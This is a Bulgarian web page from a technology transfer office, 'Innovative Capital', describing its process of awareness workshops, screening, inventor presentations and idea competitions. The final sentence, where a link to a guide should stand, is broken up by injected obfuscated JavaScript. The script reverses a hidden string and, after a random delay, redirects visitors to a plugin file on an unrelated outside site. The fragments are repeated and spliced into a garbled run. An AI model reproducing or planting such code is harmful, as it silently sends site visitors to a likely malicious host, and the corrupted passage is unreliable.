ОТТ Процес

Процесът по трансфер на технологии се състои от няколко стъпки:

  • Повишаване на информираността

Първата цел на ОТТ „Иновативен капитал” е създаване на предприемаческа култура,  която да идентифицира потенциалните възможности; по този начин да се подготви систематично подбора на идеи и изобретения чрез оценка на търговския им потенциал. Методологиите подкрепят активното търсене на приложения за развитие на технологиите и възможности за технологичен пазар и основни компетенции. Примери за мерки за идентифициране са: 

  • Работни срещи за повишаване на осведомеността

Целта на работните срещи за повишаване на осведемеността е да информират  изобретателите за ползите от комерсиализация и пускане на пазара на техните продукти. Те се запознават с възможните методи и начини за комерсиализация. Освен това, те се информират за процедурата, която се използва в скрийнинг интервютата, включително и въпросите, които се дискутират.

  • Скрийнинг

На етапа на прегледа и пресяването на технологии, идеи или приложения, се изпълняват няколко последователни стъпки. След извършване на интервютата с изследователите, възможностите, които предлагат различните пазари (както и потенциала) им се оценяват по начин, по който  резултатите от процеса да доведат до формирането на редица идеи, които могат да бъдат използвани.

  •  Срещи на изобретатели за представяне на технологии

Технологиите, избрани по време на предходната фаза, се представят на организирана кръгла маса за представяне на технологии, където изобретателите разкриват идеите на избраните експерти от съответните области. По време на представянията експертите предоставят своите коментари, които са структурирани в три основни области: пазар, технологичен потенциал и потенциал за комерсиализация. Експертите осигуряват тяхната ценна обратна връзка с препоръки (към изобретателя) относно възможни стратегии за комерсиализация, стратегии за защита на интелектуална собственост, допълнителни технологични приложения, потенциални пазари и по-нататъшно развитие. Така възможностите и тяхното приложение се оценяват по начин, при който резултатите от процеса да доведат до формирането на набор от идеи, които могат да бъдат използвани. Ако технологиите са вече утвърдени, както и ако за тях вече има разработен бизнес план, събитието се нарича Среща пред инвеститори.

  • Съревнования на идеи

Целта на съревнованията на идеи е да се анализират и оценят различни идеи от експертна комисия. Целта е да се избере идеята с най-висок потенциал за комерсиализация. Награждаването на най-добрите идеи ще насърчи носителите им да продължат с комерсиализацията. Процесът на оценяване е стандартизиран с цел улесняване вземането на  решение,  относно следващите стъпки за подпомагане.

Цялата информация за процеса по трансфер на технологии в ОТТ и заявяване на участие в семинарите на ОТТ “Иновативен Капитал”  ще откриете тук: $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.com/wp-content/uploads/2013/05/TTO-platform-guide_bg-final.toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doc">ПРОЦЕС ПО ТРАНСФЕР НА ТЕХНОЛОГИИ В ОТТ „ИНОВАТИВЕН КАПИТАЛ”.